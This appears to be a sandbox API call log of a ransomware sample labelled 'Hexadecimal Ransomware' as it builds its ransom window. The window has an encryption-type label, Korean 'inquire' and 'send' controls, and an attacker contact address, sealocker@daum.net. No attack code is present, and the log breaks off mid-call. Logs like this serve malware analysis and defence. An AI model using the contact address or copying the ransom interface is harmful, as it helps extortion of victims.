[0159.505] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf060, uEnable=0x1) returned 1 [0159.505] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0159.505] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf000, uEnable=0x0) returned 1 [0159.506] GetClientRect (in: hWnd=0x202c8, lpRect=0x11febf0 | out: lpRect=0x11febf0) returned 1 [0159.506] GetClientRect (in: hWnd=0x202c8, lpRect=0x11feb50 | out: lpRect=0x11feb50) returned 1 [0159.506] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11feb50 | out: lpRect=0x11feb50) returned 1 [0159.506] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0159.506] GetWindowLongW (hWnd=0x202c8, nIndex=-16) returned 113704960 [0159.507] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0159.507] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0159.508] GetSystemMetrics (nIndex=42) returned 0 [0159.508] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fead0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0159.508] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fead0) returned 0x16 [0159.509] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0159.509] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0159.509] GetSystemMetrics (nIndex=42) returned 0 [0159.509] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fead0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0159.509] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fead0) returned 0x16 [0159.509] GetWindowLongW (hWnd=0x202c8, nIndex=-16) returned 113704960 [0159.509] GetWindowLongW (hWnd=0x202c8, nIndex=-20) returned 327936 [0159.509] SetWindowLongW (hWnd=0x202c8, nIndex=-16, dwNewLong=46596096) returned 113704960 [0159.509] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x7c, wParam=0xfffffff0, lParam=0x11feb4c) returned 0x0 [0159.509] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x7d, wParam=0xfffffff0, lParam=0x11feb4c) returned 0x0 [0159.513] SetWindowLongW (hWnd=0x202c8, nIndex=-20, dwNewLong=327680) returned 327936 [0159.513] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x7c, wParam=0xffffffec, lParam=0x11feb4c) returned 0x0 [0159.514] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x7d, wParam=0xffffffec, lParam=0x11feb4c) returned 0x0 [0159.515] SetWindowPos (hWnd=0x202c8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0159.515] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x46, wParam=0x0, lParam=0x11feb64) returned 0x0 [0159.515] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x83, wParam=0x1, lParam=0x11feb3c) returned 0x0 [0159.516] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe890 | out: lpwndpl=0x11fe890) returned 1 [0159.516] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x47, wParam=0x0, lParam=0x11feb64) returned 0x0 [0159.516] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe840 | out: lpRect=0x11fe840) returned 1 [0159.516] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11fe840 | out: lpRect=0x11fe840) returned 1 [0159.517] RedrawWindow (hWnd=0x202c8, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0159.517] GetSystemMenu (hWnd=0x202c8, bRevert=0) returned 0x0 [0159.517] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11feb9c | out: lpwndpl=0x11feb9c) returned 1 [0159.517] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf020, uEnable=0x0) returned 1 [0159.517] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf030, uEnable=0x0) returned 1 [0159.517] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf060, uEnable=0x1) returned 1 [0159.518] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0159.518] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf000, uEnable=0x0) returned 1 [0159.518] ShowWindow (hWnd=0x202c8, nCmdShow=5) returned 0 [0159.518] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0159.518] GetCurrentActCtx (in: lphActCtx=0x11fe7ec | out: lphActCtx=0x11fe7ec*=0x153972c) returned 1 [0159.518] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0159.519] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.519] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r9_ad1", lpWindowName=0x0, dwStyle=0x56000000, X=665, Y=36, nWidth=88, nHeight=120, hWndParent=0x202c8, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x202ca [0159.519] SetWindowLongW (hWnd=0x202ca, nIndex=-4, dwNewLong=1950089536) returned 93259198 [0159.520] GetWindowLongW (hWnd=0x202ca, nIndex=-4) returned 1950089536 [0159.520] SetWindowLongW (hWnd=0x202ca, nIndex=-4, dwNewLong=93260550) returned 1950089536 [0159.520] GetWindowLongW (hWnd=0x202ca, nIndex=-4) returned 93260550 [0159.520] GetWindowLongW (hWnd=0x202ca, nIndex=-16) returned 1174405120 [0159.520] GetWindowLongW (hWnd=0x202ca, nIndex=-12) returned 0 [0159.520] SetWindowLongW (hWnd=0x202ca, nIndex=-12, dwNewLong=131786) returned 0 [0159.520] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0x81, wParam=0x0, lParam=0x11fe210) returned 0x1 [0159.521] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0x83, wParam=0x0, lParam=0x11fe1fc) returned 0x0 [0159.521] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0x1, wParam=0x0, lParam=0x11fe210) returned 0x0 [0159.522] GetWindow (hWnd=0x202ca, uCmd=0x3) returned 0x0 [0159.522] GetClientRect (in: hWnd=0x202ca, lpRect=0x11fdef8 | out: lpRect=0x11fdef8) returned 1 [0159.522] GetWindowRect (in: hWnd=0x202ca, lpRect=0x11fdef8 | out: lpRect=0x11fdef8) returned 1 [0159.522] GetParent (hWnd=0x202ca) returned 0x202c8 [0159.522] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdef8, cPoints=0x2 | out: lpPoints=0x11fdef8) returned -13893822 [0159.523] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0x5, wParam=0x0, lParam=0x780058) returned 0x0 [0159.523] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0x3, wParam=0x0, lParam=0x240299) returned 0x0 [0159.523] GetClientRect (in: hWnd=0x202ca, lpRect=0x11fdf50 | out: lpRect=0x11fdf50) returned 1 [0159.523] GetWindowRect (in: hWnd=0x202ca, lpRect=0x11fdf50 | out: lpRect=0x11fdf50) returned 1 [0159.524] GetParent (hWnd=0x202ca) returned 0x202c8 [0159.524] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdf50, cPoints=0x2 | out: lpPoints=0x11fdf50) returned -13893822 [0159.524] SendMessageW (hWnd=0x202ca, Msg=0x2210, wParam=0x2ca0001, lParam=0x202ca) returned 0x0 [0159.524] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0x2210, wParam=0x2ca0001, lParam=0x202ca) returned 0x0 [0159.524] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0159.524] GetParent (hWnd=0x202ca) returned 0x202c8 [0159.524] GetCurrentActCtx (in: lphActCtx=0x11fe7ec | out: lphActCtx=0x11fe7ec*=0x153972c) returned 1 [0159.525] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0159.525] GetClassInfoW (in: hInstance=0x0, lpClassName="STATIC", lpWndClass=0x332e844 | out: lpWndClass=0x332e844) returned 1 [0159.527] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.527] CoTaskMemAlloc (cb=0x56) returned 0x153dd90 [0159.527] RegisterClassW (lpWndClass=0x11fe6a0) returned 0xc1b5 [0159.527] CoTaskMemFree (pv=0x153dd90) [0159.528] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.528] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.STATIC.app.0.141b42a_r9_ad1", lpWindowName="Encrypt Type", dwStyle=0x5e00000d, X=667, Y=0, nWidth=94, nHeight=18, hWndParent=0x202c8, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x102d2 [0159.528] SetWindowLongW (hWnd=0x102d2, nIndex=-4, dwNewLong=1947511744) returned 93260590 [0159.529] GetWindowLongW (hWnd=0x102d2, nIndex=-4) returned 1947511744 [0159.529] SetWindowLongW (hWnd=0x102d2, nIndex=-4, dwNewLong=93260630) returned 1947511744 [0159.529] GetWindowLongW (hWnd=0x102d2, nIndex=-4) returned 93260630 [0159.529] GetWindowLongW (hWnd=0x102d2, nIndex=-16) returned 1308622861 [0159.529] GetWindowLongW (hWnd=0x102d2, nIndex=-12) returned 0 [0159.529] SetWindowLongW (hWnd=0x102d2, nIndex=-12, dwNewLong=66258) returned 0 [0159.529] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0x81, wParam=0x0, lParam=0x11fe210) returned 0x1 [0159.530] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0x83, wParam=0x0, lParam=0x11fe1fc) returned 0x0 [0159.530] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0x1, wParam=0x0, lParam=0x11fe210) returned 0x0 [0159.532] GetWindow (hWnd=0x102d2, uCmd=0x3) returned 0x202ca [0159.532] GetClientRect (in: hWnd=0x102d2, lpRect=0x11fdebc | out: lpRect=0x11fdebc) returned 1 [0159.532] GetWindowRect (in: hWnd=0x102d2, lpRect=0x11fdebc | out: lpRect=0x11fdebc) returned 1 [0159.532] GetParent (hWnd=0x102d2) returned 0x202c8 [0159.532] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdebc, cPoints=0x2 | out: lpPoints=0x11fdebc) returned -13893822 [0159.532] SetWindowTextW (hWnd=0x102d2, lpString="Encrypt Type") returned 1 [0159.532] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0xc, wParam=0x0, lParam=0x32c5208) returned 0x1 [0159.533] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0x5, wParam=0x0, lParam=0x12005e) returned 0x0 [0159.533] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0x3, wParam=0x0, lParam=0x29b) returned 0x0 [0159.533] GetClientRect (in: hWnd=0x102d2, lpRect=0x11fdf14 | out: lpRect=0x11fdf14) returned 1 [0159.533] GetWindowRect (in: hWnd=0x102d2, lpRect=0x11fdf14 | out: lpRect=0x11fdf14) returned 1 [0159.533] GetParent (hWnd=0x102d2) returned 0x202c8 [0159.533] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdf14, cPoints=0x2 | out: lpPoints=0x11fdf14) returned -13893822 [0159.533] SendMessageW (hWnd=0x102d2, Msg=0x2210, wParam=0x2d20001, lParam=0x102d2) returned 0x0 [0159.533] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0x2210, wParam=0x2d20001, lParam=0x102d2) returned 0x0 [0159.534] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0159.534] GetParent (hWnd=0x102d2) returned 0x202c8 [0159.534] GetCurrentActCtx (in: lphActCtx=0x11fe7c8 | out: lphActCtx=0x11fe7c8*=0x153972c) returned 1 [0159.534] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0159.534] GetClassInfoW (in: hInstance=0x0, lpClassName="EDIT", lpWndClass=0x332eb7c | out: lpWndClass=0x332eb7c) returned 1 [0159.535] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.536] CoTaskMemAlloc (cb=0x52) returned 0x153dbb0 [0159.536] RegisterClassW (lpWndClass=0x11fe67c) returned 0xc1b6 [0159.536] CoTaskMemFree (pv=0x153dbb0) [0159.536] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.538] CreateWindowExW (dwExStyle=0x200, lpClassName="WindowsForms10.EDIT.app.0.141b42a_r9_ad1", lpWindowName=0x0, dwStyle=0x560100c0, X=0, Y=612, nWidth=227, nHeight=20, hWndParent=0x202c8, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x102d4 [0159.538] SetWindowLongW (hWnd=0x102d4, nIndex=-4, dwNewLong=1947391072) returned 93260670 [0159.539] GetWindowLongW (hWnd=0x102d4, nIndex=-4) returned 1947391072 [0159.543] SetWindowLongW (hWnd=0x102d4, nIndex=-4, dwNewLong=93260710) returned 1947391072 [0159.543] GetWindowLongW (hWnd=0x102d4, nIndex=-4) returned 93260710 [0159.543] GetWindowLongW (hWnd=0x102d4, nIndex=-16) returned 1174470848 [0159.543] GetWindowLongW (hWnd=0x102d4, nIndex=-12) returned 0 [0159.543] SetWindowLongW (hWnd=0x102d4, nIndex=-12, dwNewLong=66260) returned 0 [0159.543] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x81, wParam=0x0, lParam=0x11fe1e8) returned 0x1 [0159.547] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x83, wParam=0x0, lParam=0x11fe1d4) returned 0x0 [0159.548] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x1, wParam=0x0, lParam=0x11fe1e8) returned 0x1 [0159.551] SendMessageW (hWnd=0x102d4, Msg=0x2055, wParam=0x102d4, lParam=0x3) returned 0x2 [0159.551] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0 [0159.551] GetWindow (hWnd=0x102d4, uCmd=0x3) returned 0x102d2 [0159.551] GetClientRect (in: hWnd=0x102d4, lpRect=0x11fdea8 | out: lpRect=0x11fdea8) returned 1 [0159.551] GetWindowRect (in: hWnd=0x102d4, lpRect=0x11fdea8 | out: lpRect=0x11fdea8) returned 1 [0159.551] GetParent (hWnd=0x102d4) returned 0x202c8 [0159.551] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdea8, cPoints=0x2 | out: lpPoints=0x11fdea8) returned -13893822 [0159.551] SendMessageW (hWnd=0x102d4, Msg=0x30, wParam=0x40a07f2, lParam=0x0) returned 0x1 [0159.551] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x30, wParam=0x40a07f2, lParam=0x0) returned 0x1 [0159.552] SendMessageW (hWnd=0x102d4, Msg=0xd3, wParam=0x3, lParam=0x0) returned 0x0 [0159.560] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0xd3, wParam=0x3, lParam=0x0) returned 0x0 [0159.562] GetSystemMetrics (nIndex=5) returned 1 [0159.562] GetSystemMetrics (nIndex=6) returned 1 [0159.562] SendMessageW (hWnd=0x102d4, Msg=0xc5, wParam=0x7fff, lParam=0x0) returned 0x1 [0159.562] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0xc5, wParam=0x7fff, lParam=0x0) returned 0x1 [0159.562] SendMessageW (hWnd=0x102d4, Msg=0xd2, wParam=0x0, lParam=0x0) returned 0x0 [0159.562] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0xd2, wParam=0x0, lParam=0x0) returned 0x0 [0159.562] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x5, wParam=0x0, lParam=0x1000df) returned 0x0 [0159.563] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x3, wParam=0x0, lParam=0x2660002) returned 0x0 [0159.563] GetClientRect (in: hWnd=0x102d4, lpRect=0x11fdf00 | out: lpRect=0x11fdf00) returned 1 [0159.563] GetWindowRect (in: hWnd=0x102d4, lpRect=0x11fdf00 | out: lpRect=0x11fdf00) returned 1 [0159.564] GetParent (hWnd=0x102d4) returned 0x202c8 [0159.564] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdf00, cPoints=0x2 | out: lpPoints=0x11fdf00) returned -13893822 [0159.564] SendMessageW (hWnd=0x102d4, Msg=0x2210, wParam=0x2d40001, lParam=0x102d4) returned 0x0 [0159.564] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x2210, wParam=0x2d40001, lParam=0x102d4) returned 0x0 [0159.565] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0159.565] GetParent (hWnd=0x102d4) returned 0x202c8 [0159.565] GetCurrentActCtx (in: lphActCtx=0x11fe7ec | out: lphActCtx=0x11fe7ec*=0x153972c) returned 1 [0159.565] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0159.566] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.568] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.STATIC.app.0.141b42a_r9_ad1", lpWindowName="문의하기", dwStyle=0x5600000d, X=0, Y=587, nWidth=60, nHeight=18, hWndParent=0x202c8, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x102d6 [0159.568] SetWindowLongW (hWnd=0x102d6, nIndex=-4, dwNewLong=1947511744) returned 93260590 [0159.569] GetWindowLongW (hWnd=0x102d6, nIndex=-4) returned 1947511744 [0159.717] SetWindowLongW (hWnd=0x102d6, nIndex=-4, dwNewLong=93260750) returned 1947511744 [0159.717] GetWindowLongW (hWnd=0x102d6, nIndex=-4) returned 93260750 [0159.717] GetWindowLongW (hWnd=0x102d6, nIndex=-16) returned 1174405133 [0159.717] GetWindowLongW (hWnd=0x102d6, nIndex=-12) returned 0 [0159.717] SetWindowLongW (hWnd=0x102d6, nIndex=-12, dwNewLong=66262) returned 0 [0159.717] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0x81, wParam=0x0, lParam=0x11fe210) returned 0x1 [0159.718] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0x83, wParam=0x0, lParam=0x11fe1fc) returned 0x0 [0159.718] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0x1, wParam=0x0, lParam=0x11fe210) returned 0x0 [0159.720] GetWindow (hWnd=0x102d6, uCmd=0x3) returned 0x102d4 [0159.720] GetClientRect (in: hWnd=0x102d6, lpRect=0x11fdebc | out: lpRect=0x11fdebc) returned 1 [0159.720] GetWindowRect (in: hWnd=0x102d6, lpRect=0x11fdebc | out: lpRect=0x11fdebc) returned 1 [0159.720] GetParent (hWnd=0x102d6) returned 0x202c8 [0159.720] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdebc, cPoints=0x2 | out: lpPoints=0x11fdebc) returned -13893822 [0159.720] SetWindowTextW (hWnd=0x102d6, lpString="문의하기") returned 1 [0159.720] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0xc, wParam=0x0, lParam=0x32c51b4) returned 0x1 [0159.721] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0x5, wParam=0x0, lParam=0x12003c) returned 0x0 [0159.721] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0x3, wParam=0x0, lParam=0x24b0000) returned 0x0 [0159.721] GetClientRect (in: hWnd=0x102d6, lpRect=0x11fdf14 | out: lpRect=0x11fdf14) returned 1 [0159.721] GetWindowRect (in: hWnd=0x102d6, lpRect=0x11fdf14 | out: lpRect=0x11fdf14) returned 1 [0159.721] GetParent (hWnd=0x102d6) returned 0x202c8 [0159.721] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdf14, cPoints=0x2 | out: lpPoints=0x11fdf14) returned -13893822 [0159.721] SendMessageW (hWnd=0x102d6, Msg=0x2210, wParam=0x2d60001, lParam=0x102d6) returned 0x0 [0159.721] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0x2210, wParam=0x2d60001, lParam=0x102d6) returned 0x0 [0159.722] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0159.722] GetParent (hWnd=0x102d6) returned 0x202c8 [0159.722] GetCurrentActCtx (in: lphActCtx=0x11fe7ec | out: lphActCtx=0x11fe7ec*=0x153972c) returned 1 [0159.722] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0159.723] GetClassInfoW (in: hInstance=0x0, lpClassName="BUTTON", lpWndClass=0x332ef8c | out: lpWndClass=0x332ef8c) returned 1 [0159.725] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.726] CoTaskMemAlloc (cb=0x56) returned 0x153deb0 [0159.726] RegisterClassW (lpWndClass=0x11fe6a0) returned 0xc1b7 [0159.726] CoTaskMemFree (pv=0x153deb0) [0159.726] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.726] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.BUTTON.app.0.141b42a_r9_ad1", lpWindowName="전송하기", dwStyle=0x5601000b, X=2, Y=642, nWidth=64, nHeight=25, hWndParent=0x202c8, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x102d8 [0159.727] SetWindowLongW (hWnd=0x102d8, nIndex=-4, dwNewLong=1947396096) returned 93260790 [0159.727] GetWindowLongW (hWnd=0x102d8, nIndex=-4) returned 1947396096 [0159.727] SetWindowLongW (hWnd=0x102d8, nIndex=-4, dwNewLong=93260830) returned 1947396096 [0159.727] GetWindowLongW (hWnd=0x102d8, nIndex=-4) returned 93260830 [0159.727] GetWindowLongW (hWnd=0x102d8, nIndex=-16) returned 1174470667 [0159.728] GetWindowLongW (hWnd=0x102d8, nIndex=-12) returned 0 [0159.728] SetWindowLongW (hWnd=0x102d8, nIndex=-12, dwNewLong=66264) returned 0 [0159.728] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x81, wParam=0x0, lParam=0x11fe210) returned 0x1 [0159.728] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x83, wParam=0x0, lParam=0x11fe1fc) returned 0x0 [0159.729] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x1, wParam=0x0, lParam=0x11fe210) returned 0x0 [0159.730] SendMessageW (hWnd=0x102d8, Msg=0x2055, wParam=0x102d8, lParam=0x3) returned 0x2 [0159.730] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0 [0159.730] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0159.730] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0159.730] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0159.730] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0159.731] RedrawWindow (hWnd=0x202ca, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0159.731] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0159.731] RedrawWindow (hWnd=0x102d2, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0159.731] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0159.731] RedrawWindow (hWnd=0x102d4, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0159.731] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0159.731] RedrawWindow (hWnd=0x102d6, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0159.732] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0159.732] RedrawWindow (hWnd=0x102d8, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0159.732] RedrawWindow (hWnd=0x202c8, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0159.732] GetWindow (hWnd=0x102d8, uCmd=0x3) returned 0x102d6 [0159.732] GetClientRect (in: hWnd=0x102d8, lpRect=0x11fdeb0 | out: lpRect=0x11fdeb0) returned 1 [0159.732] GetWindowRect (in: hWnd=0x102d8, lpRect=0x11fdeb0 | out: lpRect=0x11fdeb0) returned 1 [0159.732] GetParent (hWnd=0x102d8) returned 0x202c8 [0159.732] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdeb0, cPoints=0x2 | out: lpPoints=0x11fdeb0) returned -13893822 [0159.732] SetWindowTextW (hWnd=0x102d8, lpString="전송하기") returned 1 [0159.732] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0xc, wParam=0x0, lParam=0x32c5180) returned 0x1 [0159.733] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x5, wParam=0x0, lParam=0x190040) returned 0x0 [0159.733] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x3, wParam=0x0, lParam=0x2820002) returned 0x0 [0159.733] GetClientRect (in: hWnd=0x102d8, lpRect=0x11fdf08 | out: lpRect=0x11fdf08) returned 1 [0159.733] GetWindowRect (in: hWnd=0x102d8, lpRect=0x11fdf08 | out: lpRect=0x11fdf08) returned 1 [0159.733] GetParent (hWnd=0x102d8) returned 0x202c8 [0159.733] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x202c8, lpPoints=0x11fdf08, cPoints=0x2 | out: lpPoints=0x11fdf08) returned -13893822 [0159.734] SendMessageW (hWnd=0x102d8, Msg=0x2210, wParam=0x2d80001, lParam=0x102d8) returned 0x0 [0159.734] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x2210, wParam=0x2d80001, lParam=0x102d8) returned 0x0 [0159.734] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0159.734] GetParent (hWnd=0x102d8) returned 0x202c8 [0159.734] GetCurrentActCtx (in: lphActCtx=0x11fe7ec | out: lphActCtx=0x11fe7ec*=0x153972c) returned 1 [0159.735] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0159.735] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.735] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.STATIC.app.0.141b42a_r9_ad1", lpWindowName="E-Mail: sealocker@daum.net", dwStyle=0x5600000d, X=609, Y=653, nWidth=181, nHeight=16, hWndParent=0x202c8, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x102da [0159.737] SetWindowLongW (hWnd=0x102da, nIndex=-4, dwNewLong=1947511744) returned 93260590 [0159.738] GetWindowLongW (hWnd=0x102da, nIndex=-4) returned 1947511744 [0159.738] SetWindowLongW (hWnd=0x102da, nIndex=-4, dwNewLong=93260870) returned 1947511744 [0159.738] GetWindowLongW (hWnd=0x102da, nIndex=-4) returned 93260870 [0159.738] GetWindowLongW (hWnd=0x102da, nIndex=-16) returned 1174405133 [0159.738] GetWindowLongW (hWnd=0x102da, nIndex=-12) returned 0 [0159.738] SetWindowLongW (hWnd=0x102da, nIndex=-12, dwNewLong=66266) returned 0 [0159.739] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0x81, wParam=0x0, lParam=0x11fe210) returned 0x1 [0159.739] CallWindowProcW 